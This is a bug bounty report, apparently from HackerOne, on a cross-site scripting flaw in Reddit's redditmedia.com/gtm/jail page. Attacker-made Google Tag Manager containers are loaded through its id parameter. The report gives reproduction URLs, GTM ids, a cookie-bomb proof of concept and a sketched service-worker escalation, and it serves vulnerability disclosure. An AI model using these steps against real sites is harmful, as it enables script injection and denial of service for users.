Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneKeer0kH1:862882
HistoryApr 29, 2020 - 11:02 p.m.

Reddit: XSS in redditmedia.com can compromise data of reddit.com

2020-04-2923:02:52
keer0k
hackerone.com
27
JSON

Description

Hi, i would like to report a XSS in redditmedia.com that can affect the reddit.com application. In redditmedia.com domain we are in the domain that reddit.com use to get all the thumbmails of any post.

I found that redditmedia.com/gtm/jail uses the “id” parameter to get a valid GTM id and import it from google tag manager. With that, I can create a google tag manager account, create my own html and generate a valid GTM id to be introduced at redditmedia.com/gtm/jail.

I created a gtm with the content &lt;html&gt; <img src> &lt;/html&gt; and it worked. The XSS was triggered. You can check using the id GTM-KM2VT3H.

I discovered two scenarios that can affect reddit.com, one of which is making this XSS make a cookie bomb, creating a large amount of cookies for .redditmedia.com that will make the service unavailable to the user (only for the user who accesses the malicious GTM page)

The PoC for this case is as follows:

&lt;html&gt;
 <img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
&lt;/html&gt;

Ps: you need to put this code into your GTM tag.

after the user accesses the GTM page containing this content, thumbs, videos and other media contained on reddit.com will not be reproduced (midias that come from redditmedia.com).

The second case, is where it would be even more dangerous, however, I was unable to reproduce it, because for it to work I would need to have a jsonp endpoint at * .redditmedia.com, however, I didn’t find it. But anyway, I will explain the case.

If I had a hypothetical JSONP at redditmedia.com/anypath/?jsonp=xxx I could use this JSONP as a chain for my XSS to write a service worker in the application, this way, no matter what ID was opened at redditmedia.com/gtm/jail?id=, I could control the page and make it return a malicious script to reddit.com creating the possibility of affecting users on reddit.com.

Steps to reproduce XSS

  1. go to https://redditmedia.com/gtm/jail?id=GTM-KM2VT3H&cb=aa
  2. XSS will be trigger

Steps to reproduce XSS to Cookie Bomb

  1. go to https://redditmedia.com/gtm/jail?id==GTM-MS246QG&cb=aa
  2. Cookie will be add
  3. navigate to https://reddit.com/
  4. some thumbs, images and other midias will no apear

Impact

Its possible to compromise that cross-origin and destabilize a website for the user

JSON